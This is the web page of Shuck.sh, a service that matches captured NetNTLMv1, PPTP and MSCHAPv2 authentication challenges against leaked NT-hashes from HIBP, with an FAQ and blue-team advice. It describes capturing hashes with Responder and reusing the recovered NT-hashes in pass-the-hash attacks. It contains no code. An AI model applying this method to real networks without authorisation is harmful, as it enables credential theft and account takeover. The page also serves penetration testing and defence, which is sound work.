shuck.sh

Shuck hash before trying to crack it

Menu

Skip to content
  • Home
  • Get Shucking
  • Generator
  • Converter
  • The Technology
  • FAQ
  • News
  • Contact

Shuck hash before trying to crack it

Shuck hash before trying to crack it

In 2013, the Have I Been Pwned service began to centralize and raise awareness about data leaks by providing a bank of compromised hashes in NT-hash format.
Currently, the excellent Crack.sh service demonstrates the weakness of DES-based algorithms through the use of Field Programmable Gate Arrays (FPGAs) in less than 26 hours.
In 2020, Chick3nman presents a hash breaking optimization approach called Hash Shucking.
Shuck.sh is a free online service to shuck NetNTLMv1 (with or without ESS), PPTP VPN, WPA-Enterprise MSCHAPv2 challenges instantly against HIBP's NT-hash database. The results are ready to use via the Pass-the-Hash Attack, without requiring the plaintext.

The Technology

Behind Shuck.sh is simply an efficient and optimized binary-search for DES-keys collisions from a subset of NT-hashes candidate, whose last two bytes are known, in custom-reversed-binary HIBP's database.


HIBP-DB-v8: 847,223,402 candidate hashes leaked

During a security assessment (limited in time), if you capture ~100 NetNTLMv1 (with or without ESS) via a tool such as Responder, the search for the corresponding NT-Hashes (if leaked on HIBP) only takes a few seconds via Shuck.sh (~10s).


100 NetNTLMv1-ESS shucked in ~10 seconds

Shuck.sh takes care of simplifying by converting the cryptographic algorithm to a weaker form (without ESS if possible, in a free format for Crack.sh or directly in NT-Hash format if leaked on HIBP). Thus a NetNTLMv1-ESS/SSP, PPTP VPN or MSCHAPv2 challenge (not-free and time-consuming on Crack.sh) can potentially be shucked instantly via Shuck.sh, for free!


Shuck.sh converts and provides optimized results in several Crack.sh or Hashcat compatible formats.

Finally, for a better understanding of DES-based challenge cryptographic algorithms, Shuck.sh provides a Generator of tokens from a known plaintext or NT-Hash, and a Converter of tokens to recover NT-hash via DES-keys.

The initial idea of Shuck.sh was born from a desire to save time during security assessments for customers, not to rely on a third-party online service whose availability is not necessarily continuous and to be able to be locally autonomous.

Frequently Asked Questions

So, with shuck.sh, I don't have to use crack.sh anymore?
Absolutely NOT! Shuck.sh cannot guarantee 100% results, but is dependent on data leaks from Have I Been Pwned. No brute force nor rainbow tables are used, unlike Crack.sh.
Shuck.sh can therefore guarantee a 100% result if, and only if, the resulting NT-hash has leaked in the past. The NetNTLMv1 challenges of computer accounts, with a complex password autogenerated by the Active Directory, are therefore not relevant because they are rarely present in the leaks...
Crack.sh remains a project for research purposes only, in order to demonstrate to the community that the use of the DES algorithm is no longer considered secure at all. Shuck.sh follows the same logic, and is only dedicated to saving time and relieving the computational load of Crack.sh by exploiting the Hash Shucking technique (less intensive calculations, more eco-responsible!).

My NetNTLMv1 challenges are secured with ESS/SSP: will I have potential results for free?
YES! Shuck.sh performs Hash Shucking with or without the presence of ESS/SSP and with any challenge value, all for free and with the same performance (in seconds)!
Crack.sh offers to process NetNTLMv1 without ESS/SSP with the explicit challenge 1122334455667788 via dedicated rainbow tables for free. However, if the challenge is different or if there is the presence of ESS/SSP, it becomes chargeable and longer.

I have customer's challenges from a security assessment. I don't want to submit them online, can I use Shuck.sh locally?
Yes of course! Shuck.sh is based on a single script available on the author's Github. Anyone can therefore use it locally after downloading the huge HIBP database and converting it into a usable format (detailled on GitHub).
The public online version of Shuck.sh is fully functional and integrates the latest HIBP database, without ever keeping track of jobs submitted by users, obviously.

Do you plan to process NetNTLMv2 hashes with Shuck.sh?
Also captured by tools like Responder, NetNTLMv2 are harder to process while using the same concepts as NetNTLMv1. Different cryptographic algorithms are used (HMAC-MD5 instead of DES). Thus, neither Shuck.sh nor Crack.sh are intended and able to deal with this type of jobs.

As a blue team, which algorithms are therefore to be favored in a Microsoft ecosystem?
Try to eradicate NetNTLMv1 as much as possible (with or without ESS/SSP). Favor NetNTLMv2 or, better, Kerberos negotiations.

But, in the end, what is the definition of "Hash Shucking"?
Password shucking is a method of stripping layers off an updated password hash, removing the benefits of its new password hashing algorithm and reverting it to its weaker algorithm. Password shucking can be used by an attacker against old rehashed passwords or pre-hash passwords, enabling them to strip away or "shuck" off the strong outer password hashing algorithm.

RECENT NEWS

Shuck.sh is alive, and ShuckNT is released on GitHub!

The hash shucker dedicated to the NetNTLMv1 (with or without ESS/SSP), PPTP VPN and WPA-Enterprise MSCHAPv2 algorithms is available online, as well as on-premise on GitHub since the begining of 2023!


The Crack.sh online service was unavailable for several weeks/months at the end of 2022

For several weeks / months during the last quarter of 2022, the services of the Crack.sh online platform were unavailable / under maintenance. Now the platform is fully functional since the beginning of 2023!

 

Pwned Passwords list version 8 released by HIBP !

Pwned Passwords are hundreds of millions of real world passwords previously exposed in data breaches. This exposure makes them unsuitable for ongoing use as they're at much greater risk of being used to take over other accounts. Version 8 was released by Troy Hunt in December 2021 and contains 847,223,402 leaks.




What the Shuck? Layered Hash Shucking

Conference by Sam Croley (Chik3nman) at DEFCON's Password Village on August 8, 2020 on the concept of " What the Shuck? Layered Hash Shucking".

Site Map

  • Home
  • Get Shucking
  • Generator
  • Converter
  • The Technology
  • FAQ
  • News
  • Contact

Contact

Feel free to report any comments, bugs or ideas for improvement regarding Shuck.sh or ShuckNT via GitHub or by contacting me directly.



100% Success NOT Guarantee
Shuck.sh cannot guarantee 100% results, unlike Crack.sh which guarantees that it will 100% produce a working key for jobs submitted. The processing carried out by Shuck.sh is based on the use of the databases provided by HaveIBeenPwned, and is therefore dependent on the data leaks recorded in these databases at a given time. Shuck.sh aims to maximize the time to obtain an NT-hash from a DES-based authentication token, without claiming to be exhaustive. To gain completeness, it is recommended to turn to the excellent Crack.sh service.

Disclaimer
Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and Shuck.sh will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
This site contains materials that can be potentially badly used. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! Neither administration of this server, the authors of this material, or anyone else affiliated in any way, is going to accept responsibility for your actions.

© Copyright 2023+ ycam | shuck.sh is a free service developed and maintained by Yann CAM, Independent CyberSecurity Consultant, and is provided for research purposes only.